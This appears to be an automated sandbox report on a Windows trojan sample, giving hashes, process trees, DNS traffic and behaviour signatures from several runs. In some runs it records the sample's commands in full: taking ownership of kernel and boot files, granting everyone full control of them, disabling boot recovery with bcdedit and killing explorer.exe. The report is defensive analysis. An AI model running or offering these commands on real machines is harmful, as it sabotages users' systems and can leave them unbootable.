Analysis Overview
SHA256
88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc
Threat Level: Likely malicious
The file 88dd80a8d210b7e0f0fa327424c32b95542d9792ea28382fa0d0a71c4d211efc was found to be: Likely malicious.
Malicious Activity Summary
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 12:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.vbs"
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20231129-en
Max time kernel
120s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 2244 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 2244 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe | C:\Windows\system32\cmd.exe |
| PID 1844 wrote to memory of 2628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
| PID 1844 wrote to memory of 2628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
| PID 1844 wrote to memory of 2628 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D88.tmp\D89.tmp\D8A.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
Files
C:\Users\Admin\AppData\Local\Temp\D88.tmp\D89.tmp\D8A.bat
| MD5 | 4c46c91a5d1a43115e11db625f322414 |
| SHA1 | 53c015fe4cf56784db8eaf28048d4cfae09ffa86 |
| SHA256 | 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524 |
| SHA512 | a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda |
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240611-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240611-en
Max time kernel
120s
Max time network
120s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1916 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1916 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1916 wrote to memory of 2052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"
C:\Windows\system32\choice.exe
choice /c yn /n /m ""
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240611-en
Max time kernel
130s
Max time network
118s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winntcus64.bat"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\timeout.exe
timeout /t 30 /nobreak
Network
Files
memory/2568-0-0x000007FEFA890000-0x000007FEFA8DC000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240611-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2176 wrote to memory of 1700 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
| PID 2176 wrote to memory of 1700 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
| PID 2176 wrote to memory of 1700 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6BFC.tmp\6C0D.tmp\6C0E.vbs //Nologo
Network
Files
C:\Users\Admin\AppData\Local\Temp\6BFC.tmp\6C0D.tmp\6C0E.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240226-en
Max time kernel
143s
Max time network
155s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 440 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
| PID 440 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe | C:\Windows\system32\wscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\mmc.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\D5AF.tmp\D5B0.tmp\D5B1.vbs //Nologo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\D5AF.tmp\D5B0.tmp\D5B1.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
142s
Max time network
124s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1200 wrote to memory of 4740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 1200 wrote to memory of 4740 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"
C:\Windows\system32\choice.exe
choice /c yn /n /m ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 856 wrote to memory of 4800 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe | C:\Windows\system32\cmd.exe |
| PID 4800 wrote to memory of 4864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
| PID 4800 wrote to memory of 4864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\choice.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\420A.tmp\420B.tmp\420C.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"
C:\Windows\system32\choice.exe
choice /c yn /n /m ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\420A.tmp\420B.tmp\420C.bat
| MD5 | 7c9274396b81ebfe6570c3b6b962e91c |
| SHA1 | d1768cf3a09cc3d652ae71fde70fc76d5c472b90 |
| SHA256 | c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89 |
| SHA512 | a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240611-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2948 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
| PID 2948 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
| PID 2948 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
| PID 2948 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"
C:\Windows\system32\cscript.exe
"C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\70BD.tmp\70BE.tmp\70BF.vbs //Nologo
Network
Files
C:\Users\Admin\AppData\Local\Temp\70BD.tmp\70BE.tmp\70BF.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
147s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4544 wrote to memory of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
| PID 4544 wrote to memory of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe | C:\Windows\system32\cscript.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.exe"
C:\Windows\system32\cscript.exe
"C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\F53D.tmp\F53E.tmp\F53F.vbs //Nologo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\F53D.tmp\F53E.tmp\F53F.vbs
| MD5 | 82455ed5816ace2c6842dc84cb620b37 |
| SHA1 | cade773fe4a7bc311a08829f3b38e08ae7c1415a |
| SHA256 | 7c77c0d848319480ea3741e98baf3b3bbf5cb719cab16f5a8474f647bd172c6e |
| SHA512 | 960b6cf94bffd79e6278d3ab035a0cd7038ac6148102754936adce0197f0568caee55560eeb18df981172b868d72bf6c2595633a7fb8443d75e5a1359f7105a6 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
56s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msg.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win7-20240221-en
Max time kernel
64s
Max time network
122s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe
"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F5C.tmp\F5D.tmp\F5E.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad.exe
C:\Windows\system32\timeout.exe
timeout /t 30 /nobreak
Network
Files
C:\Users\Admin\AppData\Local\Temp\F5C.tmp\F5D.tmp\F5E.bat
| MD5 | fdc1bd905021633dfd77610ba86f7663 |
| SHA1 | 101d7151ce4993d4f314ac2e837a9f9292846cb5 |
| SHA256 | 439296ca854b289a4edb016c1ae4c37caeecd23bed10e512fc8b45c4259de9f8 |
| SHA512 | b6e6ec61cfae62c9e19e3882562e4f5ac0a53ade92d29e5cd5029e80b0a6462b09e7554493b50487cf7a18cabd823de297b8851b02677d5753eec9fee903653e |
memory/2652-2-0x000007FEF86E0000-0x000007FEF872C000-memory.dmp
memory/2652-3-0x000007FEF86E0000-0x000007FEF872C000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-19 12:33
Reported
2024-06-19 12:36
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\winnt64.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
